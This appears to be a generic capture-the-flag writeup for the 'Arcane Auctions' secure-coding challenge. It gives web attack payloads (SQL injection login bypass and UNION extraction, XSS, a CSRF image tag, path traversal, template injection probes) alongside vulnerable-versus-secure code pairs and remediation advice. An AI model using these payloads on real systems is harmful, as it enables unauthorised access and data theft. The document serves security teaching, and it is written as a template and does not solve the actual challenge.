2025 Cyber Apocalypse: Arcane Auctions

Challenge Information

Attribute    Details
Event        2025 Cyber Apocalypse
Category     Secure Coding
Challenge    Arcane Auctions

Summary

Arcane Auctions is a secure coding challenge that focuses on identifying and exploiting common web vulnerabilities. The challenge presents a web application with intentional security flaws that violate secure coding practices. Players must identify these vulnerabilities, understand their impact, and develop exploits to prove the security weaknesses.


Analysis

Vulnerability Categories

Common vulnerabilities in secure coding challenges include:

  1. SQL Injection: Unsanitized database queries
  2. Cross-Site Scripting (XSS): Unescaped user input in HTML context
  3. Cross-Site Request Forgery (CSRF): Missing request validation tokens
  4. Authentication Bypass: Weak or missing authentication checks
  5. Authorization Flaws: Insufficient access control
  6. Input Validation: Missing or incomplete input validation
  7. Sensitive Data Exposure: Hardcoded credentials or inadequate encryption
  8. Insecure Deserialization: Unsafe object deserialization
  9. File Upload Vulnerabilities: Unrestricted file uploads
  10. Logic Flaws: Business logic errors

Application Context

The challenge is set in the Eldoria universe and likely involves:

  • An auction system for magical items
  • User authentication and authorization
  • Bid placement and management
  • Item listings and descriptions

Solution

Vulnerability Discovery Methodology

Step 1: Reconnaissance

Analyze the application for:

  • Input fields and forms
  • Authentication mechanisms
  • Database interactions
  • User roles and permissions
  • File upload functionality
  • API endpoints

Step 2: Input Validation Testing

Test common injection vectors in every parameter, and watch how each is reflected or evaluated:

' OR '1'='1                       (SQL injection: a row is returned or the error changes)
<script>alert('XSS')</script>     (cross-site scripting: the tag comes back unescaped)
../../etc/passwd                  (path traversal in file or download parameters)
${7*7}                            (template/expression injection: 49 in the response means it was evaluated)

Step 3: Authentication Testing

Test for:

  • Default credentials
  • Weak password requirements
  • Session management flaws
  • Token weaknesses

Step 4: Authorization Testing

Attempt to:

  • Access other users’ data
  • Escalate privileges
  • Bypass role checks
  • Manipulate object references

Step 5: Business Logic Testing

Look for:

  • Price manipulation
  • Bid manipulation
  • Status bypasses
  • Race conditions
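The bid and price manipulation checks above come down to one pattern: the server compares a new bid against a value it read earlier (or, worse, a value the client sends back), then writes. The following is an added example, not code from the challenge or the original writeup, using an in-memory SQLite table and hypothetical handler names to show the lost-update race and the negative-price trick side by side with a conditional UPDATE that closes both. The MAX_BID limit and the sequential interleaving that stands in for two concurrent requests are assumptions made for the example.

```python
import sqlite3

MAX_BID = 1_000_000.0  # assumed business limit for the example


def make_auction():
    """Constructed auction table (not the challenge's): item 1 has a current bid of 10."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, current_bid REAL NOT NULL)")
    conn.execute("INSERT INTO items VALUES (1, 10.0)")
    conn.commit()
    return conn


def current_bid(conn, item_id):
    return conn.execute("SELECT current_bid FROM items WHERE id = ?", (item_id,)).fetchone()[0]


def bid_vulnerable(conn, item_id, amount, observed_bid):
    """VULNERABLE check-then-act: compares against a bid read in an earlier step (or sent
    back by the client in a hidden field) and never validates the amount, so a stale read
    lets a lower bid overwrite a higher one and a negative 'observed' bid lets a negative
    price through."""
    if amount <= observed_bid:
        return False
    conn.execute("UPDATE items SET current_bid = ? WHERE id = ?", (amount, item_id))
    conn.commit()
    return True


def bid_secure(conn, item_id, amount):
    """SECURE: validate the amount server-side, then make the comparison part of the write,
    so a bid that is no longer the highest matches zero rows instead of overwriting."""
    if not isinstance(amount, (int, float)) or isinstance(amount, bool):
        return False
    if not (0 < amount <= MAX_BID):  # also rejects NaN, which fails every comparison
        return False
    cur = conn.execute(
        "UPDATE items SET current_bid = ? WHERE id = ? AND current_bid < ?",
        (amount, item_id, amount),
    )
    conn.commit()
    return cur.rowcount == 1


def lost_update_vulnerable(conn):
    """The racing interleaving, simulated sequentially: two bidders read 10, the higher
    bid lands first, then the stale lower bid is accepted and the price drops."""
    seen_by_a = current_bid(conn, 1)
    seen_by_b = current_bid(conn, 1)
    bid_vulnerable(conn, 1, 20.0, seen_by_b)   # B: 20 > 10, accepted
    bid_vulnerable(conn, 1, 12.0, seen_by_a)   # A: 12 > 10 (stale), accepted, 20 is lost
    return current_bid(conn, 1)


def lost_update_secure(conn):
    """Same interleaving against the conditional UPDATE: the stale bid is rejected."""
    first = bid_secure(conn, 1, 20.0)
    second = bid_secure(conn, 1, 12.0)
    return first, second, current_bid(conn, 1)


if __name__ == "__main__":
    print("vulnerable final bid:", lost_update_vulnerable(make_auction()))
    print("secure (accepted, rejected, final):", lost_update_secure(make_auction()))
```

The conditional UPDATE works because the database evaluates `current_bid < ?` and the write atomically; with a real concurrency test, replace the sequential calls with two threads or two HTTP clients and the outcome is the same.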

Common Exploitation Patterns

SQL Injection Example

-- Vulnerable query
SELECT * FROM users WHERE username = '$input' AND password = '$pass'
-- Attack
username: admin' --
password: anything
-- Resulting query: SELECT * FROM users WHERE username = 'admin' --' AND password = '$pass'
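To see the bypass above actually succeed, and what the parameterised version does with the same input, here is an added example (not the challenge's code) that runs both login queries against a constructed in-memory SQLite database. The table names, the single `admin` account and the PBKDF2 storage in the hardened table are assumptions for the example.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000


def make_db():
    """Constructed in-memory database (not the challenge's): one account stored two ways."""
    conn = sqlite3.connect(":memory:")
    # Legacy table with a plaintext password, which the vulnerable query compares directly.
    conn.execute("CREATE TABLE legacy_users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO legacy_users VALUES (?, ?)", ("admin", "correct horse"))
    # Hardened table: salted PBKDF2-SHA256 hash, never the password itself.
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", b"correct horse", salt, PBKDF2_ROUNDS)
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", ("admin", salt, pw_hash))
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """VULNERABLE: user input is spliced into the SQL text, exactly as in the query above."""
    query = (
        "SELECT username FROM legacy_users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def secure_login(conn, username, password):
    """SECURE: parameterised lookup, then a constant-time check of the salted hash."""
    row = conn.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    db = make_db()
    attempts = [
        ("admin", "wrong"),
        ("admin' --", "anything"),                 # comment out the password check
        ("x' OR '1'='1", "x' OR '1'='1"),          # tautology in both fields
    ]
    for user, pw in attempts:
        print(f"{user!r:22} vulnerable={vulnerable_login(db, user, pw)} "
              f"secure={secure_login(db, user, pw)}")
```

With the placeholder the quote simply becomes data: the driver sends the literal string `admin' --` as the username, no row matches, and the login fails.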

XSS Example

<!-- Vulnerable code: auto-escaping disabled, or the value explicitly marked as trusted -->
<!-- (with Flask/Jinja2 auto-escaping on, a plain {{ item.name }} would already be encoded) -->
<div id="item-name">{{ item.name | safe }}</div>
<!-- Attack -->
Item name: <img src=x onerror="alert('XSS')">
<!-- Result: the tag is emitted verbatim and the onerror handler runs when the page loads -->
<div id="item-name"><img src=x onerror="alert('XSS')"></div>
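Escaping is only correct for the context the value lands in: element content, a quoted attribute and an inline `<script>` block each need a different encoder. The following added example (not from the challenge or the writeup; function names are hypothetical) renders the item name from the attack above into all three sinks with the Python standard library, so the payload becomes inert text in each.

```python
import html
import json


def encode_html_text(value: str) -> str:
    """Element-content context: & < > " ' become entities, so no tag can start."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """Quoted-attribute context: same entities; the template must wrap the value in quotes."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Inline-script context: a JSON string literal with < and > escaped, so a
    '</script>' inside the data cannot close the block (the HTML parser runs first)."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_item_vulnerable(name: str) -> str:
    """VULNERABLE: raw concatenation, equivalent to a template with auto-escaping off."""
    return f'<div id="item-name">{name}</div>'


def render_item_secure(name: str) -> str:
    """SECURE: each sink gets the encoder for its own context."""
    return (
        f'<div id="item-name" data-name="{encode_html_attr(name)}">'
        f'{encode_html_text(name)}</div>\n'
        f'<script>var itemName = {encode_js_string(name)};</script>'
    )


# The item name used in the attack above, plus a constructed payload aimed at the JS sink.
PAYLOAD = "<img src=x onerror=\"alert('XSS')\">"
SCRIPT_BREAKOUT = "</script><script>alert(1)</script>"

if __name__ == "__main__":
    print(render_item_vulnerable(PAYLOAD))
    print(render_item_secure(PAYLOAD))
    print(render_item_secure(SCRIPT_BREAKOUT))
```

Note that `encode_js_string` would still be wrong for an unquoted JavaScript context or for a URL; the rule is one encoder per sink type, never a single "sanitize" pass applied on input.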

CSRF Example

<!-- Attacker's site: the browser fetches the image URL on its own and attaches the victim's auction.com cookies -->
<img src="https://auction.com/bid?item_id=1&amount=0.01">
<!-- No click is needed: if the victim is logged in, a state-changing GET places the bid without their consent -->
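To show why the cookie alone is not enough and what a session-bound token changes, here is an added example (not the challenge's code; the handler names, session store and request shape are hypothetical) that models the forged `<img>` request, an auto-submitted forged POST, and the genuine bid form against a vulnerable and a hardened handler.

```python
import hashlib
import hmac
import secrets

# Constructed server state for the example.
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {"c0ffee-alice": "alice"}  # session cookie value -> logged-in user


def csrf_token_for(session_cookie: str) -> str:
    """Per-session token: an HMAC that another origin can neither read nor forge."""
    return hmac.new(SERVER_SECRET, session_cookie.encode(), hashlib.sha256).hexdigest()


def handle_bid_vulnerable(request, bids):
    """VULNERABLE: authenticates by cookie alone and accepts GET, so any page the victim
    loads can fire the request via <img src=...> and the browser attaches the cookie."""
    user = SESSIONS.get(request["cookies"].get("session"))
    if user is None:
        return 401
    bids.append((user, request["params"]["item_id"], float(request["params"]["amount"])))
    return 200


def handle_bid_secure(request, bids):
    """SECURE: a state change needs POST plus a token bound to this session."""
    user = SESSIONS.get(request["cookies"].get("session"))
    if user is None:
        return 401
    if request["method"] != "POST":
        return 405
    supplied = request["form"].get("csrf_token", "")
    expected = csrf_token_for(request["cookies"]["session"])
    if not hmac.compare_digest(supplied, expected):
        return 403
    bids.append((user, request["form"]["item_id"], float(request["form"]["amount"])))
    return 200


def forged_image_request():
    """What the attacker's <img src="https://auction.com/bid?item_id=1&amount=0.01"> sends:
    a cross-site GET; the browser adds the victim's cookie, the attacker controls no body."""
    return {"method": "GET", "cookies": {"session": "c0ffee-alice"},
            "params": {"item_id": "1", "amount": "0.01"}, "form": {}}


def forged_form_request():
    """A stronger attacker auto-submits a POST form; the token is still just a guess."""
    return {"method": "POST", "cookies": {"session": "c0ffee-alice"}, "params": {},
            "form": {"item_id": "1", "amount": "0.01", "csrf_token": "guess"}}


def legitimate_request():
    """The real bid form rendered by the site carries this session's own token."""
    return {"method": "POST", "cookies": {"session": "c0ffee-alice"}, "params": {},
            "form": {"item_id": "1", "amount": "50",
                     "csrf_token": csrf_token_for("c0ffee-alice")}}


if __name__ == "__main__":
    for name, req in [("img GET", forged_image_request()),
                      ("forged POST", forged_form_request()),
                      ("legitimate", legitimate_request())]:
        print(f"{name:12} vulnerable={handle_bid_vulnerable(req, [])} "
              f"secure={handle_bid_secure(req, [])}")
```

Setting the session cookie with `SameSite=Lax` or `Strict` is a worthwhile second layer, but the token check is what makes the cross-site request fail even in browsers or flows where the cookie is still attached.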

Exploitation Steps

Step 1: Identify Vulnerable Endpoint

# Enumerate input points: query parameters, form fields, JSON bodies, headers
curl -s "https://application/api/items?search=test"

Step 2: Test Vulnerability

# Test SQL injection (-G with --data-urlencode so the quote survives URL encoding)
curl -s -G "https://application/api/items" --data-urlencode "id=1' OR '1'='1"
# Test XSS (then fetch the item and check whether the name comes back unescaped)
curl -s -X POST "https://application/api/items" \
    --data-urlencode "name=<script>alert('XSS')</script>"

Step 3: Develop Exploit

import requests

# Exploit the vulnerable endpoint: a UNION that reads another table through the
# injectable search parameter (column count and table/column names must match the target)
payload = "1' UNION SELECT NULL, flag FROM flags WHERE '1'='1"
response = requests.get(
    "https://application/api/search",
    params={"query": payload},
)
print(response.text)

Step 4: Extract Flag

Once the vulnerability is confirmed, use it to read the flag or other sensitive data, and record the exact request so the finding can be reproduced and fixed.


Secure Coding Practices

Proper Implementation:

# SECURE: Use parameterized queries (the driver sends user input as data, never as SQL text)
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))

# SECURE: Rely on the template engine's auto-escaping; escape() from markupsafe (the
# library Jinja2 uses) returns a Markup string that auto-escaping will not double-encode.
# Never pass user input through Markup() or the |safe filter.
from markupsafe import escape
return render_template('item.html', item_name=escape(item.name))

<!-- SECURE: CSRF token in every state-changing form (e.g. Flask-WTF's csrf_token()) -->
<form method="POST">
    <input type="hidden" name="csrf_token" value="{{ csrf_token() }}">
    ...
</form>

# SECURE: Validate input server-side; type=int yields None for anything that is not an integer
def get_item_id(request):
    item_id = request.args.get('id', type=int)
    if item_id is None or item_id < 1:
        raise ValueError("Invalid item ID")
    return item_id

Key Takeaways

  • Defense in Depth: Multiple security layers prevent single point of failure
  • Input Validation: Always validate and sanitize user input on server-side
  • Least Privilege: Users should only have access to necessary resources
  • Secure Libraries: Use well-maintained security libraries instead of custom implementations
  • Principle of Least Trust: Never trust user input, even from “trusted” users
  • Output Encoding: Encode output based on context (HTML, URL, JavaScript, CSS)
  • Security Testing: Regular testing and code review identify vulnerabilities
  • Framework Features: Use built-in security features of frameworks (CSRF tokens, escaping)

Tools Used

  • Burp Suite: Web application security testing
  • OWASP ZAP: Automated vulnerability scanning
  • sqlmap: SQL injection detection and exploitation
  • curl/Postman: Manual request testing
  • Python: Custom exploit development
